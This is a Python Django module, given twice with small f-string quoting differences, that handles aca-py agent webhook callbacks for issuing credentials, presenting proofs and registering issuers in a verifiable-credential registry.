import json import logging import time import os import random import base64 from django.conf import settings from drf_yasg.utils import swagger_auto_schema from rest_framework import permissions, status from rest_framework.decorators import api_view, permission_classes from rest_framework.response import Response from api.v2.models.Credential import Credential as CredentialModel from api.v2.utils import log_timing_method, log_timing_event, call_agent_with_retry from agent_webhooks.utils.credential import Credential, CredentialManager from agent_webhooks.utils.issuer import IssuerManager LOGGER = logging.getLogger(__name__) TOPIC_CONNECTIONS = "connections" TOPIC_CONNECTIONS_ACTIVITY = "connections_activity" TOPIC_CREDENTIALS = "issue_credential" TOPIC_CREDENTIALS_2_0 = "issue_credential_v2_0" TOPIC_CREDENTIALS_2_0_INDY = "issue_credential_v2_0_indy" TOPIC_PRESENTATIONS = "presentations" TOPIC_PRESENT_PROOF = "present_proof" TOPIC_GET_ACTIVE_MENU = "get-active-menu" TOPIC_PERFORM_MENU_ACTION = "perform-menu-action" TOPIC_ISSUER_REGISTRATION = "issuer_registration" PROCESS_INBOUND_CREDENTIALS = os.environ.get('PROCESS_INBOUND_CREDENTIALS', 'true') if PROCESS_INBOUND_CREDENTIALS.upper() == "TRUE": LOGGER.debug(">>> YES processing inbound credentials") PROCESS_INBOUND_CREDENTIALS = True else: LOGGER.error(">>> NO not processing inbound credentials") PROCESS_INBOUND_CREDENTIALS = False RANDOM_ERRORS = os.environ.get('RANDOM_ERRORS', 'false').upper() == "TRUE" if RANDOM_ERRORS: LOGGER.error(">>> YES generating random credential processing errors") @swagger_auto_schema(method="post", auto_schema=None) @api_view(["POST"]) @permission_classes((permissions.AllowAny,)) def agent_callback(request, topic): message = request.data if "state" not in message: LOGGER.warn(f"Received aca-py webhook without state. message={message}") state = message["state"] if "state" in message else None LOGGER.debug(f"Received aca-py webhook. state={state} message={message}") start_time = time.perf_counter() method = "agent_callback." + topic + ("." + state if state else "") log_timing_event(method, message, start_time, None, False) # dispatch based on the topic type if topic == TOPIC_CONNECTIONS: response = Response("") elif topic == TOPIC_CONNECTIONS_ACTIVITY: response = Response("") elif topic == TOPIC_CREDENTIALS: response = handle_credentials(state, message) elif topic == TOPIC_CREDENTIALS_2_0: response = handle_credentials_2_0(state, message) elif topic == TOPIC_CREDENTIALS_2_0_INDY: response = handle_credentials_2_0(state, message) elif topic == TOPIC_PRESENTATIONS or topic == TOPIC_PRESENT_PROOF: response = handle_presentations(state, message) elif topic == TOPIC_GET_ACTIVE_MENU: response = Response("") elif topic == TOPIC_PERFORM_MENU_ACTION: response = Response("") elif topic == TOPIC_ISSUER_REGISTRATION: response = handle_register_issuer(message) else: LOGGER.info("Callback: topic=" + topic + ", message=" + json.dumps(message)) end_time = time.perf_counter() log_timing_method(method, start_time, end_time, False) log_timing_event(method, message, start_time, end_time, False) return Response("Invalid topic: " + topic, status=status.HTTP_400_BAD_REQUEST) end_time = time.perf_counter() log_timing_method(method, start_time, end_time, True) log_timing_event(method, message, start_time, end_time, True) return response # create one global manager instance credential_manager = CredentialManager() def handle_credentials(state, message): """ Receives notification of a credential processing event. For example, for a greenlight registration credential: message = { "connection_id": "12345", "credential_definition_id": "6qnvgJtqwK44D8LFYnV5Yf:3:CL:25:tag", "credential_exchange_id": "666", "credential_id": "67890", "credential_offer": {}, "credential_request": {}, "credential_request_metadata": {}, "credential": { "referent": "67892", "values": { "address_line_1": "2230 Holdom Avenue", "address_line_2": "", "addressee": "Ms. Brenda J Strachan", "city": "Surrey", "corp_num": "FM0243624", "country": "CA", "entity_name_effective": "2007-08-30", "entity_status": "Active", "entity_status_effective": "2007-08-30", "entity_type": "BC Company", "legal_name": "LOEFFLER PIZZA PLACE LIMITED", "postal_code": "V3T 4Y5", "province": "BC", "reason_description": "Filing:REGST", "registration_date": "2007-08-30" }, "schema_id": "6qnvgJtqwK44D8LFYnV5Yf:2:Registered Corporation:1.0.3", "cred_def_id": "6qnvgJtqwK44D8LFYnV5Yf:3:CL:25:tag", "rev_reg_id": null, "rev_reg": null, "witness": "Ian", "cred_rev_id": null, "signature": "ian costanzo, honest", "signature_correctness_proof": "honest" }, "initiator": "...", "schema_id": "...", "state": "stored", "thread_id": "..." } """ credential_exchange_id = message["credential_exchange_id"] LOGGER.debug( f'Credential: state="{state}" credential_exchange_id="{credential_exchange_id}"' ) response_data = {} try: if state == "offer_received": LOGGER.debug("After receiving credential offer, send credential request") # no need to perform a task, we run the agent with the --auto-respond-credential-offer flag set response_data = { "success": True, "details": f"Received offer on credential exchange {credential_exchange_id}", } elif state == "credential_received": raw_credential = message["raw_credential"] # You can include this exception to test error reporting if RANDOM_ERRORS: raise_random_exception(credential_exchange_id, 'credential_recieved') credential_data = { "thread_id": message["thread_id"], "schema_id": raw_credential["schema_id"], "cred_def_id": raw_credential["cred_def_id"], "rev_reg_id": raw_credential["rev_reg_id"] if "rev_reg_id" in raw_credential else None, "attrs": {}, } for attr in raw_credential["values"]: credential_data["attrs"][attr] = raw_credential["values"][attr]["raw"] return receive_credential(credential_exchange_id, credential_data) elif state == "stored": LOGGER.debug("Credential Stored") response_data = {"success": True, "details": "Credential Stored"} except Exception as e: LOGGER.error(e) LOGGER.error(f"Send problem report for {credential_exchange_id}") # Send a problem report for the error resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/issue-credential/records/{credential_exchange_id}/problem-report", post_method=True, payload={"description": str(e)}, headers=settings.ADMIN_REQUEST_HEADERS, ) resp.raise_for_status() return Response({"success": False, "error": str(e)}) return Response(response_data) def handle_presentations(state, message): LOGGER.debug(f" >>>> handle_presentations({state})") if state == "request_received": presentation_request = message["presentation_request"] presentation_exchange_id = message["presentation_exchange_id"] # Pull referents out of presentation request requested_attribute_referents = list( presentation_request["requested_attributes"].keys() ) requested_predicates_referents = list( presentation_request["requested_predicates"].keys() ) # Comma delimit all referents for agent API request referents = ",".join( requested_attribute_referents + requested_predicates_referents ) credentials = [] if presentation_request["name"].startswith("cred_id::"): cred_id = presentation_request["name"][9:] resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/credential/" + f"{cred_id}", post_method=False, headers=settings.ADMIN_REQUEST_HEADERS, ) resp.raise_for_status() wallet_credential = resp.json() wallet_credentials = { "cred_info": wallet_credential, "interval": None, "presentation_referents": requested_attribute_referents + requested_predicates_referents } credentials = [wallet_credentials, ] credential_query = presentation_request["name"] if 0 == len(credentials): resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/present-proof/records/" + f"{message["presentation_exchange_id"]}/credentials/" + f"{referents}", post_method=False, headers=settings.ADMIN_REQUEST_HEADERS, ) resp.raise_for_status() # All credentials from wallet that satisfy presentation request credentials = resp.json() credential_query = f"/present-proof/records/{message["presentation_exchange_id"]}/credentials/{referents}" # Prep the payload we need to send to the agent API credentials_for_presentation = { "self_attested_attributes": {}, "requested_attributes": {}, "requested_predicates": {}, } for referent in requested_attribute_referents: credentials_for_presentation["requested_attributes"][referent] = {} for referent in requested_predicates_referents: credentials_for_presentation["requested_predicates"][referent] = {} # we should have a single credential at this point results_length = len(credentials) if results_length != 1: raise Exception( "Number of credentials returned by query " + f"{credential_query} was not 1, it was {results_length}" ) credential = credentials[0] credential_id = credential["cred_info"]["referent"] # For all "presentation_referents" on this `credential` returned # from the wallet, we can apply this credential_id as the selected # credential for the presentation for related_referent in credential["presentation_referents"]: if ( related_referent in credentials_for_presentation["requested_attributes"] ): credentials_for_presentation["requested_attributes"][ related_referent ]["cred_id"] = credential_id credentials_for_presentation["requested_attributes"][ related_referent ]["revealed"] = True elif ( related_referent in credentials_for_presentation["requested_predicates"] ): credentials_for_presentation["requested_predicates"][ related_referent ]["cred_id"] = credential_id credentials_for_presentation["requested_predicates"][ related_referent ]["revealed"] = True else: raise Exception( f"Referent {related_referent} returned from wallet " + "was not expected in proof request." ) # We should have a fully constructed presentation now. # Let's check to make sure: for referent in credentials_for_presentation["requested_attributes"]: if credentials_for_presentation["requested_attributes"][referent] == {}: raise Exception( f"requested_attributes contains unfulfilled referent {referent}" ) for referent in credentials_for_presentation["requested_predicates"]: if credentials_for_presentation["requested_predicates"][referent] == {}: raise Exception( f"requested_predicates contains unfulfilled referent {referent}" ) # Finally, we should be able to send this payload to the agent for it # to finish the process and send the presentation back to the verifier # (to be verified) resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/present-proof/records/" + f"{presentation_exchange_id}/send-presentation", post_method=True, payload=credentials_for_presentation, headers=settings.ADMIN_REQUEST_HEADERS, ) resp.raise_for_status() return Response() def handle_register_issuer(message): """Handles the registration of a new issuing agent in the credential registry. The agent registration credential will be in the following format: { "issuer_registration_id": "string", "connection_id": "string", "issuer_registration": { "credential_types": [ { "category_labels": {"category": "label"}, "claim_descriptions": {"claim": "description"}, "claim_labels": {"claim": "label"}, "credential_def_id": "string", "schema": "string", "version": "string", "name": "string", "credential": { "effective_date": {"input": "topic_id", "from": "claim"} }, "topic": [ { "source_id": {"input": "topic_id", "from": "claim"} } ], "endpoint": "string", "cardinality_fields": ["string"], "mapping": {}, "visible_fields": ["string"], "logo_b64": "string", } ], "issuer": { "name": "string", "did": "string", "abbreviation": "string", "email": "string", "url": "string", "endpoint": "string", "logo_b64": "string" } } } """ issuer_manager = IssuerManager() updated = issuer_manager.register_issuer(message) # reset the global CredentialManager instance (to clear the CredentialType cache) global credential_manager credential_manager = CredentialManager() # update tagging policy tag_policy_updates = {} cred_types = updated.credential_types for ctype in cred_types: tag_attrs = ctype.get_tagged_attributes() if tag_attrs: tag_policy_updates[ctype.credential_def_id] = tag_attrs return Response( content_type="application/json", data={"result": updated.serialize()} ) def handle_credentials_2_0(state, message): """ Receives notification of a credential 2.0 processing event. For example, for a registration credential: message = { "cred_proposal": { ... }, "role": "issuer", "initiator": "self", "created_at": "2021-04-30 02:54:32.925351Z", "conn_id": "ae5f0b97-746e-4062-bdf2-27b9d6809cc9", "auto_issue": true, "cred_preview": { ... }, "cred_ex_id": "e2f41814-d625-4218-9f53-879111398372", "cred_request": { ... }, "auto_offer": false, "state": "credential-issued", "updated_at": "2021-04-30 02:54:33.138119Z", "cred_issue": { "@type": "did:sov:BzCbsNYhMrjHiqZDTUASHg;spec/issue-credential/2.0/issue-credential", "@id": "0f0104e6-43ca-47e1-85e0-4fd41b10688f", "formats": [ { "attach_id": "0", "format": "hlindy-zkp-v1.0" } ], "credentials~attach": [ { "@id": "0", "mime-type": "application/json", "data": { "base64": "..." } } ] }, "cred_offer": { ... }, "thread_id": "dd56313f-1787-47f7-8838-d6931284ae30" } """ cred_ex_id = message["cred_ex_id"] LOGGER.debug(f'Credential: state="{state}" cred_ex_id="{cred_ex_id}"') response_data = {} try: if state == "offer-received": LOGGER.debug("After receiving credential offer, send credential request") # no need to perform a task, we run the agent with the --auto-respond-credential-offer flag set response_data = { "success": True, "details": f"Received offer on credential exchange {cred_ex_id}", } elif state == "credential-received": cred_issue = message["cred_issue"] if cred_issue is None: LOGGER.error(" >>> Error cred_issue missing for " + cred_ex_id) return Response("Error cred_issue missing for credential", status=status.HTTP_400_BAD_REQUEST) # You can include this exception to test error reporting if RANDOM_ERRORS: raise_random_exception(cred_ex_id, 'credential-recieved') cred_data = {} for cred_fmt in cred_issue["formats"]: att_id = cred_fmt["attach_id"] cred_att = [att for att in cred_issue["credentials~attach"] if att["@id"] == att_id][0] if cred_att is None: LOGGER.error( " >>> Error data cred_att could not be parsed for " + cred_ex_id) return Response("Error credential attachment could not be parsed from cred_issue", status=status.HTTP_400_BAD_REQUEST) cred_raw_base64 = cred_att["data"]["base64"] cred_raw = json.loads(base64.b64decode(cred_raw_base64)) if cred_raw is None: LOGGER.error( " >>> Error data cred_issue could not be parsed for " + cred_ex_id) return Response("Error credential data could not be parsed from cred_issue", status=status.HTTP_400_BAD_REQUEST) cred_data = { "thread_id": cred_issue["~thread"]["thid"], "schema_id": cred_raw["schema_id"], "cred_def_id": cred_raw["cred_def_id"], "rev_reg_id": cred_raw["rev_reg_id"] if "rev_reg_id" in cred_raw else None, "attrs": {k: v["raw"] for k, v in cred_raw["values"].items()}, } return receive_credential(cred_ex_id, cred_data, "2.0") else: LOGGER.warn(f"Handler for state: {state} not implemented") response_data = {"success": True, "details": f"State received {state}"} except Exception as e: LOGGER.error(e) LOGGER.error(f"Send problem report for {cred_ex_id}") # Send a problem report for the error resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/issue-credential-2.0/records/{cred_ex_id}/problem-report", post_method=True, payload={ "description": str(e) }, headers=settings.ADMIN_REQUEST_HEADERS, ) resp.raise_for_status() return Response({"success": False, "error": str(e)}) return Response(response_data) def receive_credential(cred_ex_id, cred_data, v=None): try: existing = False if PROCESS_INBOUND_CREDENTIALS: credential = Credential(cred_data) # sanity check that we haven't received this credential yet cred_id = credential.thread_id existing_credential = CredentialModel.objects.filter(credential_id=cred_id) if 0 < len(existing_credential): # TODO - credential already exists in the database, what to do? LOGGER.error(" >>> Received duplicate for credential_id: " + cred_id + ", exch id: " + cred_ex_id) existing = True ret_cred_id = cred_id else: # new credential, populate database credential = credential_manager.process(credential) ret_cred_id = credential.credential_id else: ret_cred_id = cred_data["thread_id"] # check if the credential is in the wallet already if existing: resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/credential/{ret_cred_id}", post_method=False, headers=settings.ADMIN_REQUEST_HEADERS, ) if resp.status_code == 404: existing = False # Instruct the agent to store the credential in wallet if not existing: # post with retry - if returned status is 503 unavailable retry a few times resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/issue-credential{"-" + v if v else ""}/records/{cred_ex_id}/store", post_method=True, payload={"credential_id": ret_cred_id}, headers=settings.ADMIN_REQUEST_HEADERS, ) if resp.status_code == 404: # TODO assume the credential exchange has completed? resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/credential/{ret_cred_id}", post_method=False, headers=settings.ADMIN_REQUEST_HEADERS, ) if resp.status_code == 404: LOGGER.error( " >>> Error cred exchange id is missing but credential is not available for " + cred_ex_id + ", " + ret_cred_id) return Response("Error cred exchange id is missing but credential is not available", status=status.HTTP_400_BAD_REQUEST) pass else: resp.raise_for_status() response_data = { "success": True, "details": f"Received credential with id {ret_cred_id}", } return Response(response_data) except Exception as e: raise e def raise_random_exception(cred_ex_id, method=""): if 1 == random.randint(1, 50): print(f"Raise random exception for {cred_ex_id} from method: {method}") raise Exception("Deliberate error to test problem reporting")
import json import logging import time import os import random import base64 from django.conf import settings from drf_yasg.utils import swagger_auto_schema from rest_framework import permissions, status from rest_framework.decorators import api_view, permission_classes from rest_framework.response import Response from api.v2.models.Credential import Credential as CredentialModel from api.v2.utils import log_timing_method, log_timing_event, call_agent_with_retry from agent_webhooks.utils.credential import Credential, CredentialManager from agent_webhooks.utils.issuer import IssuerManager LOGGER = logging.getLogger(__name__) TOPIC_CONNECTIONS = "connections" TOPIC_CONNECTIONS_ACTIVITY = "connections_activity" TOPIC_CREDENTIALS = "issue_credential" TOPIC_CREDENTIALS_2_0 = "issue_credential_v2_0" TOPIC_CREDENTIALS_2_0_INDY = "issue_credential_v2_0_indy" TOPIC_PRESENTATIONS = "presentations" TOPIC_PRESENT_PROOF = "present_proof" TOPIC_GET_ACTIVE_MENU = "get-active-menu" TOPIC_PERFORM_MENU_ACTION = "perform-menu-action" TOPIC_ISSUER_REGISTRATION = "issuer_registration" PROCESS_INBOUND_CREDENTIALS = os.environ.get('PROCESS_INBOUND_CREDENTIALS', 'true') if PROCESS_INBOUND_CREDENTIALS.upper() == "TRUE": LOGGER.debug(">>> YES processing inbound credentials") PROCESS_INBOUND_CREDENTIALS = True else: LOGGER.error(">>> NO not processing inbound credentials") PROCESS_INBOUND_CREDENTIALS = False RANDOM_ERRORS = os.environ.get('RANDOM_ERRORS', 'false').upper() == "TRUE" if RANDOM_ERRORS: LOGGER.error(">>> YES generating random credential processing errors") @swagger_auto_schema(method="post", auto_schema=None) @api_view(["POST"]) @permission_classes((permissions.AllowAny,)) def agent_callback(request, topic): message = request.data if "state" not in message: LOGGER.warn(f"Received aca-py webhook without state. message={message}") state = message["state"] if "state" in message else None LOGGER.debug(f"Received aca-py webhook. state={state} message={message}") start_time = time.perf_counter() method = "agent_callback." + topic + ("." + state if state else "") log_timing_event(method, message, start_time, None, False) # dispatch based on the topic type if topic == TOPIC_CONNECTIONS: response = Response("") elif topic == TOPIC_CONNECTIONS_ACTIVITY: response = Response("") elif topic == TOPIC_CREDENTIALS: response = handle_credentials(state, message) elif topic == TOPIC_CREDENTIALS_2_0: response = handle_credentials_2_0(state, message) elif topic == TOPIC_CREDENTIALS_2_0_INDY: response = handle_credentials_2_0(state, message) elif topic == TOPIC_PRESENTATIONS or topic == TOPIC_PRESENT_PROOF: response = handle_presentations(state, message) elif topic == TOPIC_GET_ACTIVE_MENU: response = Response("") elif topic == TOPIC_PERFORM_MENU_ACTION: response = Response("") elif topic == TOPIC_ISSUER_REGISTRATION: response = handle_register_issuer(message) else: LOGGER.info("Callback: topic=" + topic + ", message=" + json.dumps(message)) end_time = time.perf_counter() log_timing_method(method, start_time, end_time, False) log_timing_event(method, message, start_time, end_time, False) return Response("Invalid topic: " + topic, status=status.HTTP_400_BAD_REQUEST) end_time = time.perf_counter() log_timing_method(method, start_time, end_time, True) log_timing_event(method, message, start_time, end_time, True) return response # create one global manager instance credential_manager = CredentialManager() def handle_credentials(state, message): """ Receives notification of a credential processing event. For example, for a greenlight registration credential: message = { "connection_id": "12345", "credential_definition_id": "6qnvgJtqwK44D8LFYnV5Yf:3:CL:25:tag", "credential_exchange_id": "666", "credential_id": "67890", "credential_offer": {}, "credential_request": {}, "credential_request_metadata": {}, "credential": { "referent": "67892", "values": { "address_line_1": "2230 Holdom Avenue", "address_line_2": "", "addressee": "Ms. Brenda J Strachan", "city": "Surrey", "corp_num": "FM0243624", "country": "CA", "entity_name_effective": "2007-08-30", "entity_status": "Active", "entity_status_effective": "2007-08-30", "entity_type": "BC Company", "legal_name": "LOEFFLER PIZZA PLACE LIMITED", "postal_code": "V3T 4Y5", "province": "BC", "reason_description": "Filing:REGST", "registration_date": "2007-08-30" }, "schema_id": "6qnvgJtqwK44D8LFYnV5Yf:2:Registered Corporation:1.0.3", "cred_def_id": "6qnvgJtqwK44D8LFYnV5Yf:3:CL:25:tag", "rev_reg_id": null, "rev_reg": null, "witness": "Ian", "cred_rev_id": null, "signature": "ian costanzo, honest", "signature_correctness_proof": "honest" }, "initiator": "...", "schema_id": "...", "state": "stored", "thread_id": "..." } """ credential_exchange_id = message["credential_exchange_id"] LOGGER.debug( f'Credential: state="{state}" credential_exchange_id="{credential_exchange_id}"' ) response_data = {} try: if state == "offer_received": LOGGER.debug("After receiving credential offer, send credential request") # no need to perform a task, we run the agent with the --auto-respond-credential-offer flag set response_data = { "success": True, "details": f"Received offer on credential exchange {credential_exchange_id}", } elif state == "credential_received": raw_credential = message["raw_credential"] # You can include this exception to test error reporting if RANDOM_ERRORS: raise_random_exception(credential_exchange_id, 'credential_recieved') credential_data = { "thread_id": message["thread_id"], "schema_id": raw_credential["schema_id"], "cred_def_id": raw_credential["cred_def_id"], "rev_reg_id": raw_credential["rev_reg_id"] if "rev_reg_id" in raw_credential else None, "attrs": {}, } for attr in raw_credential["values"]: credential_data["attrs"][attr] = raw_credential["values"][attr]["raw"] return receive_credential(credential_exchange_id, credential_data) elif state == "stored": LOGGER.debug("Credential Stored") response_data = {"success": True, "details": "Credential Stored"} except Exception as e: LOGGER.error(e) LOGGER.error(f"Send problem report for {credential_exchange_id}") # Send a problem report for the error resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/issue-credential/records/{credential_exchange_id}/problem-report", post_method=True, payload={"description": str(e)}, headers=settings.ADMIN_REQUEST_HEADERS, ) resp.raise_for_status() return Response({"success": False, "error": str(e)}) return Response(response_data) def handle_presentations(state, message): LOGGER.debug(f" >>>> handle_presentations({state})") if state == "request_received": presentation_request = message["presentation_request"] presentation_exchange_id = message["presentation_exchange_id"] # Pull referents out of presentation request requested_attribute_referents = list( presentation_request["requested_attributes"].keys() ) requested_predicates_referents = list( presentation_request["requested_predicates"].keys() ) # Comma delimit all referents for agent API request referents = ",".join( requested_attribute_referents + requested_predicates_referents ) credentials = [] if presentation_request["name"].startswith("cred_id::"): cred_id = presentation_request["name"][9:] resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/credential/" + f"{cred_id}", post_method=False, headers=settings.ADMIN_REQUEST_HEADERS, ) resp.raise_for_status() wallet_credential = resp.json() wallet_credentials = { "cred_info": wallet_credential, "interval": None, "presentation_referents": requested_attribute_referents + requested_predicates_referents } credentials = [wallet_credentials, ] credential_query = presentation_request["name"] if 0 == len(credentials): resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/present-proof/records/" + f"{message['presentation_exchange_id']}/credentials/" + f"{referents}", post_method=False, headers=settings.ADMIN_REQUEST_HEADERS, ) resp.raise_for_status() # All credentials from wallet that satisfy presentation request credentials = resp.json() credential_query = f"/present-proof/records/{message['presentation_exchange_id']}/credentials/{referents}" # Prep the payload we need to send to the agent API credentials_for_presentation = { "self_attested_attributes": {}, "requested_attributes": {}, "requested_predicates": {}, } for referent in requested_attribute_referents: credentials_for_presentation["requested_attributes"][referent] = {} for referent in requested_predicates_referents: credentials_for_presentation["requested_predicates"][referent] = {} # we should have a single credential at this point results_length = len(credentials) if results_length != 1: raise Exception( "Number of credentials returned by query " + f"{credential_query} was not 1, it was {results_length}" ) credential = credentials[0] credential_id = credential["cred_info"]["referent"] # For all "presentation_referents" on this `credential` returned # from the wallet, we can apply this credential_id as the selected # credential for the presentation for related_referent in credential["presentation_referents"]: if ( related_referent in credentials_for_presentation["requested_attributes"] ): credentials_for_presentation["requested_attributes"][ related_referent ]["cred_id"] = credential_id credentials_for_presentation["requested_attributes"][ related_referent ]["revealed"] = True elif ( related_referent in credentials_for_presentation["requested_predicates"] ): credentials_for_presentation["requested_predicates"][ related_referent ]["cred_id"] = credential_id credentials_for_presentation["requested_predicates"][ related_referent ]["revealed"] = True else: raise Exception( f"Referent {related_referent} returned from wallet " + "was not expected in proof request." ) # We should have a fully constructed presentation now. # Let's check to make sure: for referent in credentials_for_presentation["requested_attributes"]: if credentials_for_presentation["requested_attributes"][referent] == {}: raise Exception( f"requested_attributes contains unfulfilled referent {referent}" ) for referent in credentials_for_presentation["requested_predicates"]: if credentials_for_presentation["requested_predicates"][referent] == {}: raise Exception( f"requested_predicates contains unfulfilled referent {referent}" ) # Finally, we should be able to send this payload to the agent for it # to finish the process and send the presentation back to the verifier # (to be verified) resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/present-proof/records/" + f"{presentation_exchange_id}/send-presentation", post_method=True, payload=credentials_for_presentation, headers=settings.ADMIN_REQUEST_HEADERS, ) resp.raise_for_status() return Response() def handle_register_issuer(message): """Handles the registration of a new issuing agent in the credential registry. The agent registration credential will be in the following format: { "issuer_registration_id": "string", "connection_id": "string", "issuer_registration": { "credential_types": [ { "category_labels": {"category": "label"}, "claim_descriptions": {"claim": "description"}, "claim_labels": {"claim": "label"}, "credential_def_id": "string", "schema": "string", "version": "string", "name": "string", "credential": { "effective_date": {"input": "topic_id", "from": "claim"} }, "topic": [ { "source_id": {"input": "topic_id", "from": "claim"} } ], "endpoint": "string", "cardinality_fields": ["string"], "mapping": {}, "visible_fields": ["string"], "logo_b64": "string", } ], "issuer": { "name": "string", "did": "string", "abbreviation": "string", "email": "string", "url": "string", "endpoint": "string", "logo_b64": "string" } } } """ issuer_manager = IssuerManager() updated = issuer_manager.register_issuer(message) # reset the global CredentialManager instance (to clear the CredentialType cache) global credential_manager credential_manager = CredentialManager() # update tagging policy tag_policy_updates = {} cred_types = updated.credential_types for ctype in cred_types: tag_attrs = ctype.get_tagged_attributes() if tag_attrs: tag_policy_updates[ctype.credential_def_id] = tag_attrs return Response( content_type="application/json", data={"result": updated.serialize()} ) def handle_credentials_2_0(state, message): """ Receives notification of a credential 2.0 processing event. For example, for a registration credential: message = { "cred_proposal": { ... }, "role": "issuer", "initiator": "self", "created_at": "2021-04-30 02:54:32.925351Z", "conn_id": "ae5f0b97-746e-4062-bdf2-27b9d6809cc9", "auto_issue": true, "cred_preview": { ... }, "cred_ex_id": "e2f41814-d625-4218-9f53-879111398372", "cred_request": { ... }, "auto_offer": false, "state": "credential-issued", "updated_at": "2021-04-30 02:54:33.138119Z", "cred_issue": { "@type": "did:sov:BzCbsNYhMrjHiqZDTUASHg;spec/issue-credential/2.0/issue-credential", "@id": "0f0104e6-43ca-47e1-85e0-4fd41b10688f", "formats": [ { "attach_id": "0", "format": "hlindy-zkp-v1.0" } ], "credentials~attach": [ { "@id": "0", "mime-type": "application/json", "data": { "base64": "..." } } ] }, "cred_offer": { ... }, "thread_id": "dd56313f-1787-47f7-8838-d6931284ae30" } """ cred_ex_id = message["cred_ex_id"] LOGGER.debug(f'Credential: state="{state}" cred_ex_id="{cred_ex_id}"') response_data = {} try: if state == "offer-received": LOGGER.debug("After receiving credential offer, send credential request") # no need to perform a task, we run the agent with the --auto-respond-credential-offer flag set response_data = { "success": True, "details": f"Received offer on credential exchange {cred_ex_id}", } elif state == "credential-received": cred_issue = message["cred_issue"] if cred_issue is None: LOGGER.error(" >>> Error cred_issue missing for " + cred_ex_id) return Response("Error cred_issue missing for credential", status=status.HTTP_400_BAD_REQUEST) # You can include this exception to test error reporting if RANDOM_ERRORS: raise_random_exception(cred_ex_id, 'credential-recieved') cred_data = {} for cred_fmt in cred_issue["formats"]: att_id = cred_fmt["attach_id"] cred_att = [att for att in cred_issue["credentials~attach"] if att["@id"] == att_id][0] if cred_att is None: LOGGER.error( " >>> Error data cred_att could not be parsed for " + cred_ex_id) return Response("Error credential attachment could not be parsed from cred_issue", status=status.HTTP_400_BAD_REQUEST) cred_raw_base64 = cred_att["data"]["base64"] cred_raw = json.loads(base64.b64decode(cred_raw_base64)) if cred_raw is None: LOGGER.error( " >>> Error data cred_issue could not be parsed for " + cred_ex_id) return Response("Error credential data could not be parsed from cred_issue", status=status.HTTP_400_BAD_REQUEST) cred_data = { "thread_id": cred_issue["~thread"]["thid"], "schema_id": cred_raw["schema_id"], "cred_def_id": cred_raw["cred_def_id"], "rev_reg_id": cred_raw["rev_reg_id"] if "rev_reg_id" in cred_raw else None, "attrs": {k: v["raw"] for k, v in cred_raw["values"].items()}, } return receive_credential(cred_ex_id, cred_data, "2.0") else: LOGGER.warn(f"Handler for state: {state} not implemented") response_data = {"success": True, "details": f"State received {state}"} except Exception as e: LOGGER.error(e) LOGGER.error(f"Send problem report for {cred_ex_id}") # Send a problem report for the error resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/issue-credential-2.0/records/{cred_ex_id}/problem-report", post_method=True, payload={ "description": str(e) }, headers=settings.ADMIN_REQUEST_HEADERS, ) resp.raise_for_status() return Response({"success": False, "error": str(e)}) return Response(response_data) def receive_credential(cred_ex_id, cred_data, v=None): try: existing = False if PROCESS_INBOUND_CREDENTIALS: credential = Credential(cred_data) # sanity check that we haven't received this credential yet cred_id = credential.thread_id existing_credential = CredentialModel.objects.filter(credential_id=cred_id) if 0 < len(existing_credential): # TODO - credential already exists in the database, what to do? LOGGER.error(" >>> Received duplicate for credential_id: " + cred_id + ", exch id: " + cred_ex_id) existing = True ret_cred_id = cred_id else: # new credential, populate database credential = credential_manager.process(credential) ret_cred_id = credential.credential_id else: ret_cred_id = cred_data["thread_id"] # check if the credential is in the wallet already if existing: resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/credential/{ret_cred_id}", post_method=False, headers=settings.ADMIN_REQUEST_HEADERS, ) if resp.status_code == 404: existing = False # Instruct the agent to store the credential in wallet if not existing: # post with retry - if returned status is 503 unavailable retry a few times resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/issue-credential{'-' + v if v else ''}/records/{cred_ex_id}/store", post_method=True, payload={"credential_id": ret_cred_id}, headers=settings.ADMIN_REQUEST_HEADERS, ) if resp.status_code == 404: # TODO assume the credential exchange has completed? resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/credential/{ret_cred_id}", post_method=False, headers=settings.ADMIN_REQUEST_HEADERS, ) if resp.status_code == 404: LOGGER.error( " >>> Error cred exchange id is missing but credential is not available for " + cred_ex_id + ", " + ret_cred_id) return Response("Error cred exchange id is missing but credential is not available", status=status.HTTP_400_BAD_REQUEST) pass else: resp.raise_for_status() response_data = { "success": True, "details": f"Received credential with id {ret_cred_id}", } return Response(response_data) except Exception as e: raise e def raise_random_exception(cred_ex_id, method=""): if 1 == random.randint(1, 50): print(f"Raise random exception for {cred_ex_id} from method: {method}") raise Exception("Deliberate error to test problem reporting")
